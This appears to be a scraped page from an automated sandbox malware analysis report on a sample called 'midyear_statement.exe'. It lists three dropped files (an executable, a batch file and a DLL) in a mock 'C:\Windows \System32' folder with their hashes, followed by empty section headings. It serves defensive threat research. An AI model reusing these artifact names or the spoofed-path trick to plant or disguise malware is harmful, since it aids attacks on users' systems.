C:\Windows \System32\2506803.exe	PE32+ executable (GUI) x86-64, for MS Windows	231CE1E1D7D98B44371FFFF407D68B59	25510D0F6353DBF0C9F72FC880DE7585E34B28FF	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
C:\Windows \System32\KDECO.bat	DOS batch file, Unicode text, UTF-8 text, with very long lines (432), with CRLF line terminators	C545650595B479C81AD6B9D8882AAE39	7A98AA2E6EEE23B3C1BBA876955D525BC618B3F0	A3A80983CB33159F0455FA0135789402558BAA1460DB94D0071318512B8CB5F9
C:\Windows \System32\netutils.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	FA7AA88417D0C48807144A1A48FE3FBC	6F5EC990B12D4A6075050A94E0D68D03781FA46D	2019DCD18BA7D5554A4A9DA882740AA883941670AF3DE9396960081A0F8AA098

Windows Analysis Report midyear_statement.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
midyear_statement.exe

Malware Threat Intel
Provided by